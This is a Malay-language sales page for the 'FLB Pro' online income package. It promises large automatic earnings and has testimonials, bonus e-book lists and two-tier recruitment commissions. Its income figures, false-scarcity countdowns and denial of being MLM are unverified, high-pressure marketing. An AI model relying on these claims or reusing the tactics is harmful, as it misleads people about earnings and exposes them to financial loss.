Pelajar Jana RM6,200
Dengan Sistem FLB Pro!

Lihat penyata saya diatas, pada bulan April 2008 sahaja saya telah menjana hampir RM1480. Bukannya susah sangat, hanya bawa pelawat ke web sahaja sahaja, dan selebihnya diuruskan oleh sistem FLB! Sehingga hari ini, saya telah menerima lebih RM6,000 komisen daripada Sistem FLB! - Fazlisham, pelajar Kuala Lumpur

"Tak Sangka Dapat RM600 Dari Maybank2u..."

" Syukur Alhamdulillah... tak sangka dapat email dari maybank2u arini... RM600 lak masuk..terima kasih banyak sifu..nilah kali pertama saya berpuas hati setelah masuk bermacam2 bisnes.FLB memang permulaan
yang bagus.Lepas ni nak usahakan broker hotlist lak. Mudahan bisness gayapos yang sifu ajar tu pon menjadi. At least duit yang saya dapat dari FLB ni boleh saya guna tuk belanja saya besalin dalam 2 mgu lagi ni..
Doakan saya selamat ye sifu nizam..saya baru nak try wat blog lak ni..baru nak blaja2 ni.nt dah wat blog saya bg tau sifu.tq..

- Adila, Johor Bahru

 

Jika anda sudah tidak tahan untuk buat duit, anda belum lihat lagi kemuncaknya apabila anda menjadi FLB Pro...

Network JV Antara FLB PRO! Ini adalah misi dan projek jangka panjang untuk semua ahli flb pro. Saya sedang mencari 2000 sahaja untuk saya latih sebagai FLB PRO dan mempunyai paling kurang 1000 list dalam masa 30 hari! Ini bermakna jika dikumpulkan semua, network kita akan mempunyai paling kurang 100,000 - 200,000 list! Apa maknanya semua ini?Cuba bayangkan jika anda mempunyai produk anda sendiri. Anda boleh membuat JV dengan semua FLB PRO untuk mempromosikan produk anda kepada list-list mereka! Katakan anda menjual produk berharga RM50 dan selepas anda berikan komisen 50% atau RM25 kepada JV, walau hanya 3% yang memesan produk anda...Keuntungan anda: 3% x 100,000 x RM25= RM75,000!Jika produk berharga RM50, anda dapat RM150,000!Jika produk berharga RM100, anda dapat RM300,000!

Inilah kemuncak apabila anda menjadi FLB PRO, network antara ahli akan memberikan pulangan berlipat kali ganda kepada anda!

Saya berminat untuk jadi FLB PRO,
tetapi berapa yang saya perlu bayar?

Saya suka dengan orang yang bersikap positif dan cepat merebut peluang keemasan. Tetapi sebelum itu...Bayangkan jika anda mengupah orang lain membina laman web anda, paling kurang anda perlu membayar RM500 untuk reka cipta dan ini tidak termasuk nama domain, webhosting dan autoresponder berharga tidak kurang RM500 lagi. Disini sahaja anda sudah habiskan RM1000.

Mungkin anda mempunyai wang sebanyak itu, tetapi jika anda masih baru, apa yang hendak paparkan dilaman web anda jika anda tiada pengalaman langsung dengan pemasaran internet? Kini, sebagai FLB PRO, anda akan menerima pakej Formula Luar Biasa (bernilai RM3000) , bonus-bonus eksklusif termasuk hakcipta Sistem RM750 Sehari dan ebuku-ebuku jutawan internet (berharga RM3000 jika anda memesan secara berasingan diinternet)! Pakej ini akan saya poskan kerumah anda!

Setelah saya berfikir secara mendalam, anda boleh menjadi FLB PRO dan menerima pakej eksklusif yang bernilai lebih RM7000 dengan hanya RM1495 RM795 sahaja untuk pakej FLB Pro!

Tetapi tunggu....Sebagai tawaran istimewa untuk 3000 pesanan pertama yang tercepat merebut peluang ini, anda hanya perlu membayar RM795 RM295 sahaja!

Ingat, saya mahu memenuhkan kuota 2000 FLB PRO untuk membina 100,000 list dalam tempoh tercepat, sebab itulah saya tawarkan pada harga istimewa RM295 sahaja. Selepas kuota ini dipenuhi, harganya akan saya naikkan kepada RM795!

Oleh kerana sambutan yang diluar dugaan saya sama sekali, anda perlu bertindak sekarang semasa harganya masih lagi rendah! Selepas itu harganya akan dinaikkan mengikut bilangan kuota ahli FLB Pro seperti berikut:

Bilangan Ahli: 1- 3000 = RM295
(Cepat kini tinggal = 3000 575 Tempat Sahaja!)

Bilangan Ahli: 3001 keatas = RM795

Harga Flb Pro masih RM295, cepat sebelum kuota 3000 dipenuhi tidak lama lagi dan harganya dinaikkan. Pesan Sekarang!

KLIK DISINI UNTUK TEMPAHAN SISTEM FLB PRO

Dan jika anda fikir saya berhenti setakat ini sahaja, anda silap. Ini kerana anda belum lihat apa yang akan anda terima jika anda bertindak sepantas kilat...

Download BONUS-KILAT Serta Merta Jika Anda Memesan FLB Pro Sekarang!
(Anda boleh download terus selepas bayaran disahkan!)

Pakej Bonus-Kilat #1:

4 Projek Buat Wang Segera DiInternet!(Bernilai RM199)

4 program terhangat ini boleh anda gunakan untuk buat wang segera melalui internet dengan cepat! Anda hanya ikut langkah demi langkah teknik mudah yang didedahkan dalam 5 ebuku dibawah ini:

Pakej Bonus-Kilat #2: (Bernilai RM199!)

Million Dollars Special Reports!

8 laporan eksklusif ini akan menjadikan anda jauh ke depan dalam pemasaran internet dan jadikan anda kaya!

1. Get 1000 Opt Ins This Month
2. Get 10 Super Affiliates In 14 Days
3. How To Create Hot $10 Dollar Reports
4. How To Dominate Twitter
5. $5000 Per Month With Membership Sites
6. 1000 Unique Visitors A Day
7. Get Filthy Rich On One Dollar Products
8. $500 Per Month System For Newbies

Pakej Bonus-Kilat #7: (Bernilai RM299!)

13 Video Eksklusif Langkah Demi Langkah Buat Duit Dari Internet

 

1. VIDEO: 5 Ways To Build Opt In List
2. VIDEO: 10 Google Steps
3. VIDEO: 15 Easy Ways To Boost Response
4. VIDEO: 29 Webstite Tricks
5. VIDEO: 30 Minute Minisite
6. VIDEO: Adsense Cash
7. VIDEO: Audio Mastery
8. VIDEO: Automatic Updating Content
9. VIDEO: How To Build Huge Keywords
10. VIDEO: How To Create PDF Products
11. VIDEO: How To Set Up Membership Sites
12. VIDEO: Instant Software
13. VIDEO: Maximize Adsense Income

Anda juga mendapat:

Pakej Bonus-Kilat #3: (Bernilai RM199)

8 Audio Reports Anda Boleh Cetak Dan Jual!

Anda mendapat hakcipta produk, lengkap dengan skrip dalam words, pdf file dan audio mp3 untuk produk berikut:#1: Amazing Advertising Tips
#2: Blockbuster Cash Secrets
#3: Breakthrough Sales Solutions
#4: Clever Profit Generating Insights
#5: Covert Product Selling Principles
#6: Customer Tested Buying Triggers
#7: Explosive Influence Tactics
#8: Extreme Persuasion Strategies

Anda juga mendapat:

Pakej Bonus Kilat #4: (Bernilai RM99)

7 Dollar Report BestSeller!

7 Dollar Reports telah mengegarkan dunia internet, anda mendapat koleksi bestseller 7 reports berikut:

1. List Blueprint
2. Pill Gates Profit Principles
3. Cheap Affiliate Profits
4. Membership Surge
5. Quick Affiliate Profits

Nak lagi? Ok , anda juga mendapat:

Pakej Bonus-Kilat #5: (Bernilai RM199)

6 Ebooks Master Resell Rights

Pakej Bonus-Kilat #6: (Bernilai RM99)

5 Templates Laman Web Eksklusif

Anda boleh gunakan templates pros ini untuk membuat laman web anda sendiri tanpa perlu mengupah orang lain yang tentunya mahukan wang anda!

Pakej Bonus-Kilat #7: (Bernilai RM299)

8 Master Resell Rights
Anda Boleh Cetak Dan Jual!

1.Sales Letter For Newbies
2.PLR Voodoo
3.Virology
4.Tip Article Creator
5.List Building Mastery
6.Easy JV and Affiliate Manager
7.Internet Marketing Essentials
8.Following the Guru

Semua produk bonus kilat diatas bernilai RM1,492 jika anda beli secara berasingan diinternet! Tetapi untuk anda sebagai ahli FLB Pro, anda boleh download terus secara PERCUMA selepas bayaran disahkan!

 

Jika anda masih samar-samar, saya ringkaskan kelebihan-kelebihan yang akan anda perolehi sebagai ahli kelab FLB Pro hari ini!

 


Ringkasnya, Sebagai Ahli FLB Pro Anda Akan Memiliki Kelebihan Ini DiInternet:

#1 = Link Pengedar Khas Eksklusif!!
Setelah kajian intensif, laman web ini mampu membina list untuk anda 24 jam sehari. List adalah mereka yang berminat dengan apa yang anda tawarkan. Setakat ini, lebih 60,000 list telah dibina dengan web ini dan meningkat! Jadi misi utama anda ialah membawa seramai trafik (pelawat) klik link anda, itu sahaja. Saya akan dedahkan kepada anda 3 teknik pros membawa trafik dengan senang!

#2- Autoresponder Yang Berikan Maklumat & Mesej Jualan Kepada List Anda Secara Automatik! Selepas anda membina list dengan web tadi, sistem akan membuat followup secara automatik. Jangan risau, semuanya telah saya siapkan untuk anda! Jadi anda hanya tumpukan membawa trafik ke web sahaja dan sistem akan mengambil tugas seterusnya!

#3- Komisen lumayan FLB Pro untuk anda - 2 tier:
Peringkat 1: RM100 x 20 orang = RM2,000!
Peringkat 2: RM50 x 20x20 orang= RM20,000!

#4- Komisen Untuk Produk-Produk Baru Mega Strategy dan ahli FLB Pro yang lain! Anda boleh menjana komisen untuk produk-produk baru dari semasa ke semasa samada produk anda sendiri, ahli flb pro yang lain atau Mega Strategy.

#5- Anda Mendapat Produk Hakcipta & Bonus Kilat Bernilai Ribuan Ringgit! Jual dan simpan 100% wang kekocek anda! Bonus Kilat siap sedia untuk didownload selepas bayaran disahkan!

#6- Berpeluang Menjana Komisen RM500 Setiap List Dengan CD PLR! Komisen kedua untuk anda jika list anda upgrade! RM500 sehari bermakna RM15,000 Sebulan!

#7- Joint Venture Dengan FLB Pro Dengan 100,000 List!
Tak perlu susah cari prospek. Anda boleh jual produk anda
secara JV dengan semua ahli FLB Pro! Walau hanya 1% pesan, anda mampu menjana RM20,000K ~ RM50,000 sekelip mata!

 

Untuk memesan sila klik kotak dibawah dan isikan semua maklumat yang diminta.

* Nota: Sila check email pengesahan daripada saya di folder INBOX/BULK/SPAM, biasanya dalam tempoh 24-48 jam *

Ya, Mohd Nizam! Saya sudah bersedia untuk sertai Kelab Eksklusif FLB Pro dan menikmati semua keistimewaan!

Pesan Sekarang!
Hanya RM795... RM295

 

*Sila tuliskan kodFB:7513 pada borang tempahan untuk mendapatkan bonus kilat eksklusif!*

 

Hmm... Apa? Anda tidak yakin?

Untuk makluman anda, ingin saya tekankan disini bahawa Sistem FLB Pro:

- Bukan Pelaburan Internet!
- Bukan Forex, Adsense!
- Bukan Sistem Matrix 5x5!
- Bukan MLM atau Forex!
- Bukan Skim Cepat Kaya!

Jika anda hanya mahu duduk goyang kaki tunggu duit masyuk, saya merayu kepada anda supaya jangan masuk. Ini adalah bisnes internet dan saya mahukan komitmen 100% daripada anda untuk membina empayar internet yang disegani!Saya akan tunjukkan kepada anda cara sebenar buat duit diinternet, bina list, komunikasi dengan mereka, dan joint venture bersama FLB PRO yang lain!

Kita menjual produk maklumat yang menolong orang biasa seperti saya dan anda, buat duit secara automatik dari rumah dengan revolusi internet! FLB PRO adalah satu-satunya sistem yang digunakan oleh jutawan internet barat menjana ratusan ribu ringgit sebulan dengan menekan satu butang sahaja!

Dan jika anda masih ragu-ragu, dengar ini baik-baik...Saya mahu anda mencuba sistem FLB PRO ini untuk tempoh setahun! Ikut apa yang saya akan tunjukkan, dan jika anda tidak berpuas hati juga, pulangkan pakej Formula Luar Biasa dan wang anda akan saya pulangkan. TANPA SOALAN LANGSUNG! (**Nota: Wang yang dikembalikan akan ditolak komisen penaja anda dan proses.)

Jika anda tidak buat duit, saya juga tidak mahu wang anda! Setuju?

Jadi apa yang anda tunggu lagi, jika anda hendak buat duit secara automatik dari rumah. PESAN PAKEJ FLB PRO sekarang!

Saya menunggu jawapan positif daripada anda!

Demi Kejayaan Anda,

Mohd Nizam & Nuraimi

PS: Saya tahu anda menerima pelbagai tawaran buat duit diinternet hampir setiap hari dan tentunya banyak yang perlu anda fikirkan. Percayalah, saya benar-benar ingin menolong anda buat duit secara automatik dari rumah. Bayangkan perubahan dalam hidup anda jika wang meledak ke akaun bank seperti ini...

MELETOPPP " RM307,072.36 JAN 2011 - OGOS 2011 AUTOMATIK!!

Adakah ini yang anda juga impikan selama ini??

* Anda Boleh Bayar Hutang Kad Kredit & Pinjaman Peribadi!
* Anda Mampu Beli Apa Sahaja Yang Anak Anda Minta!
* Anda Boleh Melancong Dan Duduk Hotel 5 Stars!
* Anda Boleh Membeli Kereta Idaman Anda... BMW mungkin?

Dan YA! Saya dah 'sambar' satu ;)

PPS: Sebagai ahli FLB PRO, anda akan mendapat link khas laman web terhangat yang buat duit 24 jam sehari. Apa yang perlu anda lakukan ialah promosi link khas ini dengan teknik yang akan saya tunjukkan! Semuanya akan saya siapkan untuk anda! Autoreponder akan menghantar mesej buat duit secara automatik, apabila mereka memesan produk-produk saya, komisen lumayan akan didepositkan terus keakaun bank anda... walaupun anda sedang tidur! Anda bina list dan buat duit pada masa yang sama dengan FLB PRO! EKSKLUSIF!

PPPS: Gunakan sistem saya dan buat duit. Jika anda tidak berpuas hati, kembalikan kepada saya dan anda dapat semula wang anda (selepas ditolak komisen penaja)! Apa lagi yang anda tunggu?

PESAN FLB PRO DENGAN HARGA ISTIMEWA RM795 RM295 SEKARANG! Cepat, kini tempat hanya tinggal3000 2665 1277 754 575 sahaja!

Saya belum habis lagi...

PESANAN PANTAS 48 JAM: BONUS48JAM#1:

Rahsia Dalaman Yang Mampu Menjana RM300 Sehari Dengan Modal Hanya RM5 Secara Autopilot! Dengan Kerja Hanya 30 Minit, Langkah Demi Langkah Ditunjukkan!

Jika anda memesan dalam masa 48 jam, anda akan didedahkan dengan satu strategi orang malas yang digunakan oleh seorang remaja untuk menjana $15,000 dalam masa 1 bulan dan hanya luangkan masa 30 minit untuk setup.Dan kerja selama 30 minit telah menjana lebih kurang RM300 sehari. Tanpa perlu pemantauan, tanpa perlu buat laman web sendiri! Satu teknik buat duit cara senang melalui internet pernah dibongkar!

Jika anda memesan dalam masa 48 jam, rahsia hebat ini dalam genggaman anda. Sebagai bukti, sila lihat akaun paypal beliau selepas menggunakan teknik ini:

Bonus ini hanya diberikan jika anda memesan dalam masa 48 jam darisekarang. (Ebuku ini dalam versi bahasa Inggeris bernilai RM350!)

BONUS48JAM#2:

"Cracking The Internet Millionaire Code" Rahsia Jutawan Internet, JoHan Mok!

Saya mempunyai Lesen Sah Resell Right untuk produk Jo Han "Cracking The Internet Millionaires Code" Produk ini dijual dengan harga $97 (RM350) diinternet sekarang dan laris seperti goreng pisang panas! Jo Han akan dedahkan 7 kod rahsia yang beliau gunakan untuk menjadi jutawan internet ketika berumur 28 tahun! Bagaimana pula cara beliau peroleh RM276,500 dalam masa 72 jam?

Anda boleh melihat apa yang bakal anda perolehi DENGAN KLIK DISINI(Jangan beli disana, saya berikan PERCUMA jika anda menjadi ahli FLB PRO)

BONUS48JAM#3:

** BONUS MISTERI **

Tip: Bonus misteri ini pasti akan membuatkan anda tersenyum riang ke bank! ;)

 

 

DOWNLOAD PERCUMA!!

Sila download laporan 'Rahsia RM245,752' anda disini.
(Tekan mouse kanan dan klik Save Target As pada buku dibawah)

 

Soalan-Soalan Yang Biasa DiTanya (FAQ)

 

FLB Memang Real !
"Inilah pertama kali saya mendapat duit dari
internet. Saudara Nizam.. setelah banyak program
yang saya cuba. Terima Kasih banyak-banyak..
semoga saya dapat gunakan teknik promosi FLB
dengan lebih hebat lagi..Formula Luar Biasa
memang real.Saya akan usahakan untuk masukkan
dalam blog... Thanx Bro!
- Rindy, Beluran Sabah

Satu Sistem Genius! RM2200 Setakat Ini!
"FLB Pro adalah satu sistem genius yang mampu
menambah pendapatan pasif saya. Tidak perlu
berjumpa orang, dan saya hanya menjalankannya
secara part time sahaja. Bukan SCAM yang didakwa
oleh sesetengah orang yang tidak percaya malahan
tidak mahu mencuba formula yang sungguh luar biasa ini. Dengan modal 3 angka, saya telah mendapat RM2200 dan mampu menjana 4 malah 5 angka pendapatan. Terima kasih Nizam, you are the best!!!"
-Fadzil, Ampang Selangor

Terima Kasih!
"Terima kasih sahabat ku mohd nizam kerna tuan
sangat perhatin dngn sahabat2 yang lain berkongsi
tips cara langsaikan hutang. pada hemat ku ni cara
yang tuan guna ni memang berkesan untuk saya cuba dan masuk akal juga. InsyAllah akan ku guna tips ni mula hari in, Amin.. "
-Jumadil Andi

RM1600 Dalam 14 Hari!
"Saya sertai FLB pro pada 28 Dec 08, dan tidak sampai dua minggu sahaja saya sudah menjana RM1600 secara automatik! Teknik yang beliau berikan cukup mudah difahami dan dengan sistem yang sedia ada tidak mustahil saya menjana 5 angka pada 2009!"
- Nazrim, Kuala Kangsar

RM100, RM200 Masuk Akaun!
"Memang menakjubkan bila hari-hari kita dapat
tengok RM100, RM200 masuk dalam akaun bank
kita. Terima Kasih FLB pro and En. Nizam
atas komisen yang diberikan!"
- Adizakri, Kota Kinabalu

Memang Meletup!
"Terima kasih atas komisen hari ini. Saya akan
terus setia bersama FLB Pro! Semuga bisnes kita
terus maju "- Reza, Johor Bahru

Arigato... RM36,150!
"4 hari lepas aku menerima komisyen RM700 dari
owner Formula Luar Biasa - Mohd Nizam. Hari ni,
tengah ralit YM dengan WanMus,dapat lagi komisyen RM700. Hohoho.. Tak kusangka.Hebat betul kaedah pemasaran ciptaan bro Nizam ni. Arigato bro.. Komisen terkumpul RM36,150!
- Hisham, Ipoh

7 Sales = RM700!
"Saya nak ucap terima kasih atas pembayaran
komisyen pertama saya untuk 7 sales, RM700 setakat ini. Kini baru saya nampak potensi FLB Pro!" - Yusof, Padang Serai

RM400 Balik Shopping!
"salam nizam.!!thanx alot di atas komisen rm400 untuk harini!! Tadi pergi shopping.. habis rm300!!
then balik shopping tgk akaun bank ..duit betambah rm400!!haha seronoknya.. esok leh shopping lg!!thanx alot22!!! caya la bro!!moga business kte makin maju..hik4"- Zulfadli, Teluk Intan

RM300!

"Pagi tadi terima email maybank2u mengatakan
ada RM300 daripada saudara Mohd Nizam! Mulanya memang ragu-ragu kini hasilnya ada didepan mata! Ucapan terima kasih daripada saya. "-Sam, Ampang

RM200 tengah Ngeteh!
"Sambil lepak ngeteh di restoran, aku check email
ada RM200 daripada maybank2u. Wow komisen lagi daripada FLB pro. Sistem buat duit paling mudah pernah aku jumpa!"- Masrule, Kota Tinggi

RM200 diterima!
"Sudah mendapat bayaran, terima kasih kepada yang membantu. Saya terus berusaha mempromosikan FLB Pro!"- Ridzuan, PutraJaya

 

" Sesuatu Yang Pelik Berlaku Pada M2U Saya... RM47,350!!"

" Saya sudah bergiat dengan bisnes online selama lebih 4 tahun. Semuanya sudah saya cuba - buat web, blog, adsense, clickbank, squidoo, youtube - memang leceh, teknikal dan perlukan banyak masa.. hasilnya habuk pun tarak! Adus ... :( Tetapi selepas saya mencuba sistem FLB Pro yang 10x lebih senang... sesuatu yang agak PELIK berlaku. Akaun maybank saya tiba-tiba masuk duit hari-hari.. tengah ngeteh pun duit masuk... RM100, RM200 malah RM600 sehari pun ada (lihat email maybank2u dibawah)

Kini saya sudah menjana RM47,350 part time sambil kerja kilang ahaks.... dan makin bertambah setiap hari. Simpan separuh di ASB dan bayar hutang mana yang patut. Tak perlu penat-penat kerja overtime lagi! Bro... terima kasih kerana tolong saya! "

-Masrule, Programmer, Seri Alam

" RM24,250 Dengan Laman Web Rahsia... Bestnyer...!"

" Wah!!bestnyer tak sempat esok dapat lagi hari ni..Terima kasih byk2 kerana ini lah rezeki yang saya tunggu2 selama ini iaitu pendapatan sampingan yang lumayan. Saya akan ikut semua tunjuk ajar yang diberikan dan saya berharap bisnes ini bejalan lancar selama-lamanya. Setakat ini saya telah menjana RM24,250 dengan menempah iklan dilamanweb rahsia! Tempah iklan dan tunggu duit masukk... mudahkan! Terima kasih FLB PRO! )

Norazlina, Cikgu, Jasin

 

Ya, Mohd Nizam! Saya sudah bersedia untuk sertai Kelab Eksklusif FLB Pro dan menikmati semua keistimewaan!

Pesan Sekarang!
Hanya RM795... RM295

*Sila tuliskan kodFB:7513 pada borang tempahan untuk mendapatkan bonus kilat eksklusif!*

KLIK DISINI UNTUK BUAT DUIT DENGAN SISTEM FLB PRO

Earnings Disclaimer

EVERY EFFORT HAS BEEN MADE TO ACCURATELY REPRESENT THIS PRODUCT AND IT'S POTENTIAL. EVEN THOUGH THIS INDUSTRY IS ONE OF THE FEW WHERE ONE CAN WRITE THEIR OWN CHECK IN TERMS OF EARNINGS, THERE IS NO GUARANTEE THAT YOU WILL EARN ANY MONEY USING THE TECHNIQUES AND IDEAS IN THESE MATERIALS. EXAMPLES IN THESE MATERIALS ARE NOT TO BE INTERPRETED AS A PROMISE OR GUARANTEE OF EARNINGS. EARNING POTENTIAL IS ENTIRELY DEPENDENT ON THE PERSON USING OUR PRODUCT, IDEAS AND TECHNIQUES. WE DO NOT PURPORT THIS AS A “GET RICH SCHEME.”

ANY CLAIMS MADE OF ACTUAL EARNINGS OR EXAMPLES OF ACTUAL RESULTS CAN BE VERIFIED UPON REQUEST. YOUR LEVEL OF SUCCESS IN ATTAINING THE RESULTS CLAIMED IN OUR MATERIALS DEPENDS ON THE TIME YOU DEVOTE TO THE PROGRAM, IDEAS AND TECHNIQUES MENTIONED, YOUR FINANCES, KNOWLEDGE AND VARIOUS SKILLS. SINCE THESE FACTORS DIFFER ACCORDING TO INDIVIDUALS, WE CANNOT GUARANTEE YOUR SUCCESS OR INCOME LEVEL. NOR ARE WE RESPONSIBLE FOR ANY OF YOUR ACTIONS.

MATERIALS IN OUR PRODUCT AND OUR WEBSITE MAY CONTAIN INFORMATION THAT INCLUDES OR IS BASED UPON FORWARD-LOOKING STATEMENTS WITHIN THE MEANING OF THE SECURITIES LITIGATION REFORM ACT OF 1995. FORWARD-LOOKING STATEMENTS GIVE OUR EXPECTATIONS OR FORECASTS OF FUTURE EVENTS. YOU CAN IDENTIFY THESE STATEMENTS BY THE FACT THAT THEY DO NOT RELATE STRICTLY TO HISTORICAL OR CURRENT FACTS. THEY USE WORDS SUCH AS “ANTICIPATE,” “ESTIMATE,” “EXPECT,” “PROJECT,” “INTEND,” “PLAN,” “BELIEVE,” AND OTHER WORDS AND TERMS OF SIMILAR MEANING IN CONNECTION WITH A DESCRIPTION OF POTENTIAL EARNINGS OR FINANCIAL PERFORMANCE.

ANY AND ALL FORWARD LOOKING STATEMENTS HERE OR ON ANY OF OUR SALES MATERIAL ARE INTENDED TO EXPRESS OUR OPINION OF EARNINGS POTENTIAL. MANY FACTORS WILL BE IMPORTANT IN DETERMINING YOUR ACTUAL RESULTS AND NO GUARANTEES ARE MADE THAT YOU WILL ACHIEVE RESULTS SIMILAR TO OURS OR ANYBODY ELSES, IN FACT NO GUARANTEES ARE MADE THAT YOU WILL ACHIEVE ANY RESULTS FROM OUR IDEAS AND TECHNIQUES IN OUR MATERIAL.

(c) Hakcipta Terpelihara Mohd Nizam: Mega Strategy, PO BOX 99, 81700 Pasir Gudang.

Amaran: Sebarang ubah suai dan ciplak akan didakwa!

Term of Services I Contact Us I Privacy Policy | Disclaimer | Blog